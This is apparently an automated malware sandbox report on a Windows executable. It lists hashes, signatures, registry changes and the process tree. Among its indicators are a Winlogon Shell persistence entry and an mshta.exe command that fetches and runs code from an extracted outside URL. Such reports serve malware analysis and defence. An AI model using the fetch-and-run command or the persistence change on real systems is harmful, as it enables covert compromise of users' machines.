Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
40s -
max time network
49s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2023, 16:56
Behavioral task
behavioral1
Sample
0723631d44c8870c1a0dec5ba31ba621.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0723631d44c8870c1a0dec5ba31ba621.exe
Resource
win10v2004-20231215-en
Errors
General
-
Target
0723631d44c8870c1a0dec5ba31ba621.exe
-
Size
525KB
-
MD5
0723631d44c8870c1a0dec5ba31ba621
-
SHA1
cfc31802293fb71ad5bc7f54fe1ecd0e2780b668
-
SHA256
a823643d7bd5594e42ff72c5c1129a636041387511790f21c5c1d94a3423d11b
-
SHA512
2966c2d9670496c2b28a7f0c8b68669d48531ac1c13659a99ca02a4f4e0f92da63bb29a05adbe69c206538bc0234f976c570fc0ea7072194c1ee2ad2f7848e4a
-
SSDEEP
12288:FrS7qHEmWv55+MgvWSL0RAa/s+6+/fgl/tZRn:cOkDvf+Vt0RAa/SXDn
Malware Config
Extracted
http://raptopreport.com/inst.php?id=02901
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\hotfix.exe" 0723631d44c8870c1a0dec5ba31ba621.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation 0723631d44c8870c1a0dec5ba31ba621.exe -
resource yara_rule behavioral2/memory/5052-0-0x0000000000400000-0x000000000069C000-memory.dmp upx behavioral2/memory/5052-7-0x0000000000400000-0x000000000069C000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "104" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeShutdownPrivilege 5052 0723631d44c8870c1a0dec5ba31ba621.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5052 0723631d44c8870c1a0dec5ba31ba621.exe 5052 0723631d44c8870c1a0dec5ba31ba621.exe 1224 LogonUI.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5052 wrote to memory of 5068 5052 0723631d44c8870c1a0dec5ba31ba621.exe 90 PID 5052 wrote to memory of 5068 5052 0723631d44c8870c1a0dec5ba31ba621.exe 90 PID 5052 wrote to memory of 5068 5052 0723631d44c8870c1a0dec5ba31ba621.exe 90 PID 5052 wrote to memory of 1468 5052 0723631d44c8870c1a0dec5ba31ba621.exe 91 PID 5052 wrote to memory of 1468 5052 0723631d44c8870c1a0dec5ba31ba621.exe 91 PID 5052 wrote to memory of 1468 5052 0723631d44c8870c1a0dec5ba31ba621.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\0723631d44c8870c1a0dec5ba31ba621.exe"C:\Users\Admin\AppData\Local\Temp\0723631d44c8870c1a0dec5ba31ba621.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://raptopreport.com/inst.php?id=029012⤵PID:5068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\agtyjkj.bat" "2⤵PID:1468
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39a2855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1224
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
234B
MD5037e377014cc011c45c4e647c7bcb73c
SHA149e467e5a89331425d61c2751577bd1e62e9eba3
SHA2568dcaa9326f966f3e788cb48adad30bac4518661414533a74331a1d5e9f68e59e
SHA512ee26eb9ee7079638771a22f40809f5b7fca5e706f164f72f67a8aa603b3817a1c204273bfb9d1a633a88d981b1f4c933a2bd0e9b0ad9a8b02205334c57b89ae6